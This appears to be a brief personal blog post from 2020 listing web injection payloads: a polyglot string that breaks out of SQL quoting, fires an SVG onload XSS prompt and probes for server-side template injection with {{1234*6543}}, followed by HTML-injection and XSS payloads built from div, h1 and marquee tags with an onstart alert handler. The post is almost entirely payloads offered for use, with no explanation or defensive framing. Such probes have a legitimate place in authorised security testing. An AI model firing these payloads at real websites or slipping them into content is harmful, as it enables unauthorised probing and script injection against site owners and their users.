sql+xss+ssti

'"><svg/onload=prompt(5);>{{1234*6543}}

 

 HTML INJECTION + XSS INJECTION

加粗选标记

/<div+id=JavaScript>/<h1>_Y000!_ /<div+id=JavaScript>/<marquee>_Y000!_</marquee> /<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

 

posted @ 2020-06-23 16:44  vcxvxcv  阅读(175)  评论(0)    收藏  举报